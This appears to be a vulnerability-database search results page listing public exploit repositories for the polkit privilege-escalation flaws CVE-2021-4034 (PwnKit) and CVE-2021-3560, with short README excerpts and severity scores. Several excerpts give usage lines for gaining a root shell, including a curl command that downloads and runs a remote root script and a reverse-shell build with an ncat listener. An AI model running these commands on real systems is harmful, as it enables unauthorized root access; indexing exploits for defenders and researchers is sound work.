Lucene search
+L

1795 matches found

Kitploit
Kitploit
added 2026/09/10 12:55 a.m.4 views

berdav-CVE-2021-4034

CVE-2021-4034 One day for the polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory by the real authors is here PoC If the exploit is working you'll get a root shell immediately: root@kitploit: vagrant@ubuntu-impish:/CVE-2021-4034$...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:55 a.m.5 views

CVE-2021-4034

CVE-2021-4034 polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory by my Qualys team here PoC If the exploit is working you'll get a root shell immediately: root@kitploit: kali@user:/CVE-2021-4034$ make cc -Wall --shared -fPIC -o...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:55 a.m.5 views

PwnKit-Vulnerability_CVE-2021-4034

PwnKit Vulnerability - Local Privilege Escalation Title: PwnKit Vulnerability - Local Privilege Escalation Target: Linux Category: Execution Credits: Qualys Research Team Description The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:53 a.m.6 views

pwnkit-exploit

pwnkit CVE-2021-4034 Privilege Escalation exploit sample This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexec. This implementation is based on that described in the CVE disclosure, which you should read. If this works on your machine, it means you are...

7.8CVSS6.9AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/09/10 12:53 a.m.5 views

CVE-2021-4034-new

CVE-2021-4034 One day for the polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory by the real authors is here...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:53 a.m.7 views

CVE-2021-4034

CVE-2021-4034 PoC CVE 2021-4034 PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec PoC Verified on Kali. root@kitploit: ┌──kali㉿kali-/Documents └─$ grep PRETTY /etc/os-release PRETTYNAME="Kali GNU/Linux Rolling" ──kali㉿kali-/Documents └─$ lsbrelease -a No LSB modules a...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:53 a.m.6 views

CVE-2021-3560

CVE-2021-3560 Polkit Instant Root Exploit You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in: sh -c "$curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh" Or you can download the .sh or copy and paste it. Run and Instant Root. Us...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/10 12:52 a.m.7 views

CVE-2021-4034

CVE-2021-4034 A day for the polkit privilege escalation exploit Simply run and enjoy ./blasty for your root shell. The original advisory from the real authors is - here Installation If the exploit works, you will get a root shell immediately: root@kitploit: user@tecnokarita-/Descargas $ git clone...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:52 a.m.6 views

CVE-2021-4034

CVE-2021-4034 Dirty PoC for CVE-2021-4034 Pwnkit Full credits to Qualys Team https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:52 a.m.5 views

CVE-2021-4034

CVE-2021-4034 PWNKIT Script to create e exploit vuln for CTF. Source code by github.com/berdav Real Author: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:51 a.m.7 views

CVE-2021-4034

CVE-2021-4034 The Polkit Privilege Escalation exploit. Dockerized for the sake of reproducibility. Run docker root@kitploit: docker build -t cve20214034 . docker run -it --rm cve20214034 Run the exploit root@kitploit: whoami user ./gain-root.sh whoami root References The original advisory:...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154References2
Kitploit
Kitploit
added 2026/09/10 12:51 a.m.7 views

CVE-2021-4034

CVE-2021-4034Reverse shell Exploit for Local Privilege Escalation Vulnerability in polkit’s pkexec...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:51 a.m.6 views

Polkit-CVE-2021-4034-HLP

Polkit-CVE-2021-4034-HLP Polkit CVE-2021-4034 exploitation in High-Level Programming Language Build root@kitploit: make LHOST=ip.or.domain.tld LPORT=8000 Usage Open TCP port listener, example with ncat on loopback root@kitploit: ncat -vl 127.0.0.1 8000 Run exploit root@kitploit: php...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:51 a.m.6 views

make_me_root

CVE-2021-4034-PwnKit PwnKit PoC for Polkit pkexec CVE-2021-4034 Based on the PoC by blasty blasty-vs-pkexec.c For PwnKit details see the blog poet at Qualys PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec CVE-2021-4034...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:50 a.m.3 views

CVE-2021-4034

CVE-2021-4034 Proof of Concept for CVE-2021-4034 Polkit Privilege Escalation...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:46 a.m.17 views

pkexec-exploit

pkexec-exploit Local Privilege Escalation in polkit's pkexec CVE-2021-4034 Summary Polkit formerly PolicyKit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones Exploit...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/10 12:44 a.m.13 views

log4j-polkit-poc

log4j CVE-2021-44228 + polkit CVE-2021-4034 Vulnerable instance for the log4j apache exploit and privilege escalation using polkit The vulnable spring-boot-application.jar was extracted from this docker image The malicious JNDI server was downloaded from here and referenced in this article. PoC...

10CVSS7.4AI score0.99999EPSS
SaveExploits520References1
Kitploit
Kitploit
added 2026/09/10 12:43 a.m.6 views

CVE-2021-4034-

CVE-2021-4034- PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec CVE-2021-4034 root@kitploit: user@OxYAss $ gcc blasty-vs-pkexec.c -o makemeroot user@OxYAss $ .makemeroot root@OxYAss $ whoami $ ../../.. $ $...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/09/09 11:38 p.m.8 views

poppy

poppy : CVE-2021-4034 CVE-2021-4034 PoC , polkit 0.131 Usage Tested on Arch Linux Manjaro & Axyl OS root@kitploit: git clone https://github.com/tahaafarooq/poppy make ./poppy Super user creation exploit root@kitploit: bash -c "$curl -fsSL...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/09 10:10 p.m.6 views

PwnKit

PwnKit This repository contains an exploit I developed to understand how the Polkit Pkexec vulnerability works: CVE-2021-4034 Pkexec Local Privilege Escalation. Polkit formerly known as PolicyKit is a component that controls privileges on Unix-like operating systems. It provides an organized way...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154References2
Rows per page
Query Builder